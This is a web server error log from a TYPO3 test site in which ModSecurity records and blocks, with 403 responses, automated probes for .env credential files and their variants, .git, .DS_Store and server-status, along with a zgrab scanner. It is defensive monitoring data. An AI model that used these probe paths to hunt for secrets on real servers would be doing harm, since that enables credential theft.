[Sun Sep 14 15:35:49.675204 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0GwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.675478 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0GwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.675703 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0GwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.731273 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0HAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.731518 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0HAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.731688 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0HAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.786641 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0HQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.786895 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0HQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.787065 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/administrator/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0HQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.841685 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0HgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.841925 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0HgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.842095 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0HgAAAA4"], referer: https://www.google.com/
[Mon Sep 15 04:37:55.818246 2025] [authz_core:error] [pid 2740972] [client 68.183.146.153:48772] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Sep 15 11:36:03.301930 2025] [:error] [pid 2740972] [client 196.251.70.47:52992] [client 196.251.70.47] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMfeAx2aimFXnl5hVBAoXwAAAAE"]
[Mon Sep 15 11:36:03.302253 2025] [:error] [pid 2740972] [client 196.251.70.47:52992] [client 196.251.70.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMfeAx2aimFXnl5hVBAoXwAAAAE"]
[Mon Sep 15 11:36:03.302454 2025] [:error] [pid 2740972] [client 196.251.70.47:52992] [client 196.251.70.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMfeAx2aimFXnl5hVBAoXwAAAAE"]
[Tue Sep 16 03:16:34.506426 2025] [:error] [pid 2767709] [client 3.146.111.124:41113] [client 3.146.111.124] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aMi6cl30hcq2niZnI5s-ZQAAAAc"]
[Tue Sep 16 03:16:34.506818 2025] [:error] [pid 2767709] [client 3.146.111.124:41113] [client 3.146.111.124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aMi6cl30hcq2niZnI5s-ZQAAAAc"]
[Tue Sep 16 03:16:34.507016 2025] [:error] [pid 2767709] [client 3.146.111.124:41113] [client 3.146.111.124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aMi6cl30hcq2niZnI5s-ZQAAAAc"]
[Fri Sep 19 19:54:41.172131 2025] [authz_core:error] [pid 2859854] [client 138.68.144.227:39050] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Fri Sep 19 19:54:42.407380 2025] [:error] [pid 2859853] [client 138.68.144.227:39080] [client 138.68.144.227] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aM2Y4p3Gyjtru6ydN4OtrQAAAAQ"]
[Fri Sep 19 19:54:42.407603 2025] [:error] [pid 2859853] [client 138.68.144.227:39080] [client 138.68.144.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aM2Y4p3Gyjtru6ydN4OtrQAAAAQ"]
[Fri Sep 19 19:54:42.407751 2025] [:error] [pid 2859853] [client 138.68.144.227:39080] [client 138.68.144.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aM2Y4p3Gyjtru6ydN4OtrQAAAAQ"]
[Fri Sep 19 19:54:42.504924 2025] [:error] [pid 2859806] [client 138.68.144.227:39094] [client 138.68.144.227] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM2Y4n76vjBMuVKFRY7z5QAAAAw"]
[Fri Sep 19 19:54:42.505130 2025] [:error] [pid 2859806] [client 138.68.144.227:39094] [client 138.68.144.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM2Y4n76vjBMuVKFRY7z5QAAAAw"]
[Fri Sep 19 19:54:42.505286 2025] [:error] [pid 2859806] [client 138.68.144.227:39094] [client 138.68.144.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM2Y4n76vjBMuVKFRY7z5QAAAAw"]
[Fri Sep 19 19:54:42.598220 2025] [authz_core:error] [pid 2859853] [client 138.68.144.227:39098] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Sep 19 20:46:11.745076 2025] [authz_core:error] [pid 2859870] [client 35.232.186.156:39616] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Sep 20 07:20:51.616438 2025] [:error] [pid 2867838] [client 195.178.110.15:50444] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM45s3vfo_1mV5C9QU3Z1QAAAAQ"]
[Sat Sep 20 07:20:51.616730 2025] [:error] [pid 2867838] [client 195.178.110.15:50444] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM45s3vfo_1mV5C9QU3Z1QAAAAQ"]
[Sat Sep 20 07:20:51.616907 2025] [:error] [pid 2867838] [client 195.178.110.15:50444] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aM45s3vfo_1mV5C9QU3Z1QAAAAQ"]
[Sat Sep 20 07:20:51.935315 2025] [:error] [pid 2871947] [client 195.178.110.15:50456] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aM45s09ZCrSFbu-il1n8pQAAAAk"]
[Sat Sep 20 07:20:51.935586 2025] [:error] [pid 2871947] [client 195.178.110.15:50456] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aM45s09ZCrSFbu-il1n8pQAAAAk"]
[Sat Sep 20 07:20:51.935780 2025] [:error] [pid 2871947] [client 195.178.110.15:50456] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aM45s09ZCrSFbu-il1n8pQAAAAk"]
[Sat Sep 20 07:20:52.150199 2025] [:error] [pid 2867837] [client 195.178.110.15:52280] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aM45tBWoV8GvGoZiBq3WogAAAAM"]
[Sat Sep 20 07:20:52.150490 2025] [:error] [pid 2867837] [client 195.178.110.15:52280] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aM45tBWoV8GvGoZiBq3WogAAAAM"]
[Sat Sep 20 07:20:52.150658 2025] [:error] [pid 2867837] [client 195.178.110.15:52280] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aM45tBWoV8GvGoZiBq3WogAAAAM"]
[Sat Sep 20 07:20:52.370947 2025] [:error] [pid 2867898] [client 195.178.110.15:52282] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aM45tK3RNP9eqEvJAdCb3wAAAAg"]
[Sat Sep 20 07:20:52.371198 2025] [:error] [pid 2867898] [client 195.178.110.15:52282] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aM45tK3RNP9eqEvJAdCb3wAAAAg"]
[Sat Sep 20 07:20:52.371360 2025] [:error] [pid 2867898] [client 195.178.110.15:52282] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aM45tK3RNP9eqEvJAdCb3wAAAAg"]
[Sat Sep 20 07:20:52.675576 2025] [:error] [pid 2867836] [client 195.178.110.15:52290] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aM45tN23j7fe40XI1-oibgAAAAI"]
[Sat Sep 20 07:20:52.675822 2025] [:error] [pid 2867836] [client 195.178.110.15:52290] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aM45tN23j7fe40XI1-oibgAAAAI"]
[Sat Sep 20 07:20:52.675988 2025] [:error] [pid 2867836] [client 195.178.110.15:52290] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aM45tN23j7fe40XI1-oibgAAAAI"]
